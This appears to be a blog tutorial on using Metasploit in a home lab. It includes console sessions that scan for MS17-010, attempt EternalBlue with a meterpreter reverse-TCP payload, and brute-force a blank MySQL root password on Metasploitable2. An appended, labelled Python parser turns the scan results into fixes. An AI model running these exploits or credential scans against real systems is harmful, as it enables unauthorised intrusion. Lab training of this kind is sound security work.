Kali Learning 3: MSF

metasploitable2

Metasploitable is an Ubuntu-based target VM.

After downloading it, just open the virtual machine.

The default username and password are msfadmin.

# Set the root password
sudo passwd root

# Configure a static IP
vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address xxx.xxx.xxx.xxx
netmask 255.255.255.0
gateway xxx.xxx.xxx.xxx

# Restart networking
/etc/init.d/networking restart

metasploit framework

msf depends on the PostgreSQL database, so it has to be started in Kali first.

# Start postgresql
systemctl start postgresql

# Enable it at boot
systemctl enable postgresql

PostgreSQL is also started automatically when msfconsole is opened.

  • connect command

    Mostly used in internal-network penetration testing.

    msf6 > connect
    Usage: connect [options] <host> <port>
    
    Communicate with a host, similar to interacting via netcat, taking advantage of
    any configured session pivoting.
    
    OPTIONS:
    
        -C        Try to use CRLF for EOL sequence.
        -P <opt>  Specify source port.
        -S <opt>  Specify source address.
        -c <opt>  Specify which Comm to use.
        -h        Help banner.
        -i <opt>  Send the contents of a file.
        -p <opt>  List of proxies to use.
        -s        Connect with SSL.
        -u        Switch to a UDP socket.
        -w <opt>  Specify connect timeout.
        -z        Just try to connect, then return.
    
    msf6 > connect xuegod.cn 80
    [*] Connected to xuegod.cn:80 (via: 0.0.0.0:0)
    get /
    HTTP/1.1 400 Bad Request
    Server: nginx/1.6.2
    Date: Thu, 21 Jan 2021 08:05:06 GMT
    Content-Type: text/html
    Content-Length: 172
    Connection: close
    
    <html>
    <head><title>400 Bad Request</title></head>
    <body bgcolor="white">
    <center><h1>400 Bad Request</h1></center>
    <hr><center>nginx/1.6.2</center>
    </body>
    </html>
    
    
  • show command

    show options: view the parameters the module needs

  • search command

    search name:mysql

    search path:mysql: search for vulnerability modules under the mysql directory

    search platform:mysql: search for vulnerabilities affecting the mysql platform

    search cve:CVE-2017-8464

  • use command

    use <module name>

    msf6 > search cve:8464
    
    Matching Modules
    ================
    
       #  Name                                              Disclosure Date  Rank       Check  Description
       -  ----                                              ---------------  ----       -----  -----------
       0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
       1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability
    
    
    Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe
    
    msf6 > use 0
    msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > 
    
    
  • info command

    msf6 > search cve:8464
    
    Matching Modules
    ================
    
       #  Name                                              Disclosure Date  Rank       Check  Description
       -  ----                                              ---------------  ----       -----  -----------
       0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
       1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability
    
    
    Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe
    
    msf6 > info 0
    
           Name: LNK Code Execution Vulnerability
         Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
       Platform: Windows
           Arch: x86, x64
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2017-06-13
    
    Provided by:
      Uncredited
      Yorick Koster
      Spencer McIntyre
    
    Module stability:
     crash-service-restarts
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
      1   Windows x64
      2   Windows x86
    
    Check supported:
      No
    
    Basic options:
      Name      Current Setting        Required  Description
      ----      ---------------        --------  -----------
      DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
      FILENAME  Flash Player.lnk       no        The LNK file
      PATH                             no        An explicit path to where the files will be hosted
    
    Payload information:
      Space: 2048
    
    Description:
      This module exploits a vulnerability in the handling of Windows 
      Shortcut files (.LNK) that contain a dynamic icon, loaded from a 
      malicious DLL. This vulnerability is a variant of MS15-020 
      (CVE-2015-0096). The created LNK file is similar except an 
      additional SpecialFolderDataBlock is included. The folder ID set in 
      this SpecialFolderDataBlock is set to the Control Panel. This is 
      enough to bypass the CPL whitelist. This bypass can be used to trick 
      Windows into loading an arbitrary DLL file. If no PATH is specified, 
      the module will use drive letters D through Z so the files may be 
      placed in the root path of a drive such as a shared VM folder or USB 
      drive.
    
    References:
      https://cvedetails.com/cve/CVE-2017-8464/
      https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
      http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
      https://msdn.microsoft.com/en-us/library/dd871305.aspx
      http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
      https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
    
    
Using EternalBlue against Win7

msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST=192.168.197.54
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.197.53   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.197.54:445 - Exploit aborted due to failure: no-target: This exploit module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.

The exploit failed here because the target is a 32-bit system, while the exploit built into MSF only supports 64-bit targets, so a 32-bit exploit module had to be installed (reference: 添加链接描述 [link not present in the original]). The 32-bit exploit was then run:

msf6 exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Generating Eternalblue XML data
[*] 192.168.197.54:445 - Generating Doublepulsar XML data
[*] 192.168.197.54:445 - Generating payload DLL for Doublepulsar
[*] 192.168.197.54:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.197.54:445 - Launching Eternalblue...
[+] 192.168.197.54:445 - Backdoor is already installed
[*] 192.168.197.54:445 - Launching Doublepulsar...
[+] 192.168.197.54:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

I ran it several times, but it still failed; I don't know why.

Scanning the target for a blank MySQL password with MSF

First, run search:

msf6 > search mysql_login

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login

msf6 > use 0

Then view the parameters that need to be set:

msf6 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mysql/mysql_login) > set RHOST 192.168.197.55
RHOST => 192.168.197.55

The target address set here is the Metasploitable2 VM.

msf6 auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.197.55:3306   - 192.168.197.55:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.197.55:3306   - No active DB -- Credential data will not be saved!
[+] 192.168.197.55:3306   - 192.168.197.55:3306 - Success: 'root:'
[*] 192.168.197.55:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The scan succeeded: the target's root account has a blank password.
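Both scans on this page (smb_ms17_010 and mysql_login) report their results as [+] lines in the same shape. As an added example that is not part of the original post, here is a Python parser that turns those lines into findings and produces the remediation list a defender would want from them; the sample output is constructed from the lines shown above plus one extra host with a guessable password.

```python
import re

# Constructed sample modelled on the smb_ms17_010 and mysql_login runs in this post.
SAMPLE_OUTPUT = """\
[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[!] 192.168.197.55:3306   - No active DB -- Credential data will not be saved!
[+] 192.168.197.55:3306   - 192.168.197.55:3306 - Success: 'root:'
[+] 192.168.197.56:3306   - 192.168.197.56:3306 - Success: 'admin:hunter2'
[*] Auxiliary module execution completed
"""

# "[+] host:port - message"; only [+] lines carry positive results, [*]/[!]/[-] are status.
LINE_RE = re.compile(r"^\[([+*!-])\]\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+-\s+(.*)$")
MS17_RE = re.compile(r"likely VULNERABLE to MS17-010!\s+-\s+(.*?)\s+(x86|x64)\s+\((\d+)-bit\)")
CRED_RE = re.compile(r"Success:\s+'([^:']*):([^']*)'")


def parse_msf_output(text):
    """Turn msfconsole result lines into dicts: one per vulnerable host or found credential."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(1) != "+":
            continue
        host, port, rest = m.group(2), int(m.group(3)), m.group(4)
        if v := MS17_RE.search(rest):
            findings.append({"host": host, "port": port, "kind": "ms17-010",
                             "os": v.group(1), "arch": v.group(2), "bits": int(v.group(3))})
        elif c := CRED_RE.search(rest):
            # The guessed password itself is deliberately not stored, only whether it was blank.
            findings.append({"host": host, "port": port, "kind": "credential",
                             "user": c.group(1), "blank": c.group(2) == ""})
    return findings


def remediation_report(findings):
    """What a defender has to fix: unpatched SMBv1 hosts and MySQL accounts with empty or guessable passwords."""
    actions = []
    for f in findings:
        if f["kind"] == "ms17-010":
            actions.append(f"{f['host']}: apply the MS17-010 patch and disable SMBv1 "
                           f"({f['os']}, {f['arch']})")
        elif f["blank"]:
            actions.append(f"{f['host']}:{f['port']}: MySQL user '{f['user']}' has an empty password")
        else:
            actions.append(f"{f['host']}:{f['port']}: MySQL user '{f['user']}' password was guessed")
    return actions
```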
